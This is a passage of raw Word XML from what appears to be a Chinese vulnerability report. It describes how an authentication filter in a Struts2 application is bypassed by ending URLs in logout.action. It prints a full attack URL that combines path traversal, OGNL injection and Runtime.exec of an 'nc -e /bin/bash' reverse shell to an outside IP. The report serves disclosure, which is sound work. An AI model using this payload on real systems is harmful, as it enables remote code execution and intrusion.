                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4824536" cy="891018"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00DC57FC" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:noProof/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="009A76B7" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6" w:themeFill="background1" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="009A76B7" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞验证流程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="00EB142C" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="10675" w:dyaOrig="11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444.65pt" o:ole="">
                  <v:imagedata r:id="rId13" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1499847732" r:id="rId14"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6" w:themeFill="background1" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>问题详细技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB65F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00D63C4F" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="005A1A2E" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安全问题分析</w:t>
            </w:r>
            <w:r w:rsidRPr="005A1A2E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="001E63E4">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00370EE1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>正常情况下，</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Server</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>端必须</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对每一个</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>业务操作</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>先</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行认证，</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>再进行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限检查，</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>然后对</w:t>
            </w:r>
            <w:r w:rsidR="00EF3DBC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>重要</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00EF3DBC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作再</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00EF3DBC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行CSRF防护</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
            <w:r w:rsidR="006D5184">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（例如：Token校验）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，才能完成业务操作</w:t>
            </w:r>
            <w:r w:rsidRPr="00370EE1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">； </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="001E63E4">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在异常的情况下,攻击者构造</w:t>
            </w:r>
            <w:r w:rsidR="004E5D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特殊</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>报文，模拟Ajax请求，构造的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中针对用户认证</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限校验</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="004E5D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">CSRF </w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Token校验</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的特例情况</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（例如：不严谨的白名单/黑名单）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行关键字的</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提升权限，</w:t>
            </w:r>
            <w:r w:rsidR="004E5D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行恶意操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00810806">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>其中一个可以攻击成功的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如下：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E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p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00503B54" w:rsidRDefault="001E63E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Pr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>equestURI:https//ip/path/login.action/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>/business.action;logout.action?BMECIDClosing=1&amp;BMECIDClear=#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">hacked by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>web@icsl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>),#</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>aa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>=@</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>java.lang.Runtime@getRuntime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>().exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> -e /bin/bash 172.0.87.78 12345</w:t>
            </w:r>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>), #</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>writer.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00503B54">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>(),username</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00503B54" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00F3137B" w:rsidRDefault="001E63E4" w:rsidP="001E63E4">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户认证检查时，通过判断</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的路径以</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>logout.action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结尾，跳过该过滤器</w:t>
            </w:r>
            <w:r w:rsidR="00BB3738">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（未校验</w:t>
            </w:r>
            <w:r w:rsidR="00FF17CD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>会话信息</w:t>
            </w:r>
            <w:r w:rsidR="00BB3738">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00F3137B" w:rsidRDefault="001E63E4" w:rsidP="001E63E4">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
